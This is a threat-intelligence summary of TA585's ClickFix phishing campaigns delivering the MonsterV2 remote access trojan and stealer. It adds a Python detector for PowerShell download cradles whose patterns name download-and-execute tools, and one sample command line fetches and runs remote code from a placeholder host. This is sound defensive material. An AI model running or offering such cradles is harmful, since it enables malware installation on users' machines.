- A previously unknown threat actor named TA585 distributes the malware MonsterV2 through phishing campaigns.
- MonsterV2 is a remote access trojan (RAT) and data stealer first seen advertised in February 2025.
- Phishing efforts use fake IRS notices and manipulated websites to trick users into running malicious PowerShell commands.
- The malware offers advanced features such as clipboard manipulation, hidden remote control, and download of additional payloads.
- TA585 maintains its own infrastructure for delivery and avoids infecting systems in Commonwealth of Independent States (CIS) countries.
Cybersecurity researchers have identified a threat actor known as TA585 that uses phishing campaigns to deliver the malware MonsterV2. This activity was reported in October 2025 and involves phishing lures themed around the U.S. Internal Revenue Service (IRS) to convince victims to run harmful commands on their devices.
According to the Proofpoint Threat Research Team, TA585 operates the entire attack chain itself, including the delivery infrastructure and the malware installation. MonsterV2 first appeared on cybercriminal forums in February 2025. It functions as a remote access trojan (RAT), a stealer (which extracts sensitive data), and a loader for other malicious software.
Phishing campaigns use fake IRS notices linking to PDF files that lead to web pages triggering the infection through a social engineering technique called ClickFix. In this technique the user is persuaded to paste and execute a command in the Windows Run dialog or in PowerShell, and that command then downloads and deploys MonsterV2. Later attacks used malicious JavaScript injected into legitimate websites to display fake CAPTCHA verifications that initiate the malware's delivery.
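The ClickFix chain described above ends with a script host launched from the Run dialog that fetches and runs the payload, which is a pattern endpoint telemetry can surface. The following added Python example is not Proofpoint's code or anything from the report: it scores constructed process-creation records (field names and sample command lines are assumptions) for the combination of an interactive parent, a script host, and download-cradle traits.

```python
import re
from dataclasses import dataclass
from typing import List

@dataclass
class ProcEvent:
    parent_image: str   # basename of the parent process image (assumed field)
    image: str          # basename of the created process image (assumed field)
    command_line: str

# ClickFix has the victim paste a command into the Run dialog (parent explorer.exe)
# or a console; the pasted command then pulls the payload from the web.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}

# Command-line traits that, combined, suggest a download-and-execute cradle.
CRADLE_TRAITS = {
    "download": re.compile(r"(?i)\b(iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile|net\.webclient)\b"),
    "execute": re.compile(r"(?i)\b(iex|invoke-expression)\b"),
    "encoded": re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)(\s|$)"),
    "hidden": re.compile(r"(?i)(^|\s)-w(indowstyle)?\s+hidden\b"),
    "policy": re.compile(r"(?i)-e(p|x|xec|xecutionpolicy)\b\s+(bypass|unrestricted)\b"),
}

def clickfix_traits(ev: ProcEvent) -> List[str]:
    """Return the cradle traits present when a script host was started from an
    interactive parent; an empty list means the event does not fit the pattern."""
    if ev.parent_image.lower() not in INTERACTIVE_PARENTS:
        return []
    if ev.image.lower() not in SCRIPT_HOSTS:
        return []
    return [name for name, rx in CRADLE_TRAITS.items() if rx.search(ev.command_line)]

def is_clickfix_like(ev: ProcEvent, min_traits: int = 2) -> bool:
    # Two or more traits keeps a lone "-ep bypass" from an admin from firing.
    return len(clickfix_traits(ev)) >= min_traits

# Constructed sample events; these are not real telemetry from the campaign.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe",
              'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/x)"'),
    ProcEvent("explorer.exe", "powershell.exe", "powershell -NoProfile -Command Get-Process"),
    ProcEvent("services.exe", "powershell.exe", "powershell -ep bypass -File C:\\Scripts\\backup.ps1"),
    ProcEvent("cmd.exe", "powershell.exe", "powershell -nop -w hidden -enc BASE64PLACEHOLDER"),
]

def flagged(events: List[ProcEvent] = SAMPLE_EVENTS) -> List[int]:
    """Indices of events that look like a ClickFix-style cradle."""
    return [i for i, ev in enumerate(events) if is_clickfix_like(ev)]

if __name__ == "__main__":
    for i in flagged():
        print(i, clickfix_traits(SAMPLE_EVENTS[i]), SAMPLE_EVENTS[i].command_line)
```

Tune the parent list, script hosts and threshold to your own environment; a scheduled task or management agent launching PowerShell with a file path, as in the third sample, is deliberately not flagged.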
Before switching to MonsterV2, TA585 distributed the Lumma Stealer. The infrastructure involved has also been linked to distributing other stealers like Rhadamanthys. Some campaigns used fake GitHub security alerts to deliver links to attacker-controlled sites. These activities relate to a framework called CoreSecThree, active since 2022 and known to spread stealer malware.
MonsterV2 includes features such as monitoring the clipboard for cryptocurrency addresses and replacing them with attacker-controlled wallets, running hidden virtual network computing (HVNC) sessions for covert remote control, capturing screenshots, starting keyloggers, managing files, and executing commands sent from command-and-control (C2) servers. It also refuses to run on systems located in CIS countries.
The malware is sold by a Russian-speaking threat actor for $800 per month for a standard version and $2,000 for an enterprise edition that supports advanced features such as loader functions and the Chrome DevTools Protocol. MonsterV2 is packed with a C++ crypter called SonicCrypt, which helps it avoid detection by performing anti-analysis checks and privilege escalation before connecting to its C2 server.
Once active, MonsterV2 sends system details, including geolocation obtained through a public IP lookup service, to its server. It then follows the server's instructions to perform tasks including data theft, process control, HVNC connections, keylogging, system crashes, and deployment of additional payloads such as StealC and Remcos RAT. The shared infrastructure between MonsterV2 and StealC suggests coordination between the two operations.
Proofpoint concluded that TA585 demonstrates advanced and unusual capabilities, managing complex delivery and infection methods without relying on third parties, which marks it as a significant presence in the evolving cybercrime landscape.
For more information, see the original Proofpoint report and related analysis by PRODAFT.